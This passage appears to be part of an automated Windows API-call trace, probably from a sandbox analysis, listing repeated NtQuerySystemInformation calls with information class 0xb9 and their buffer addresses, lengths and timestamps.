SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, 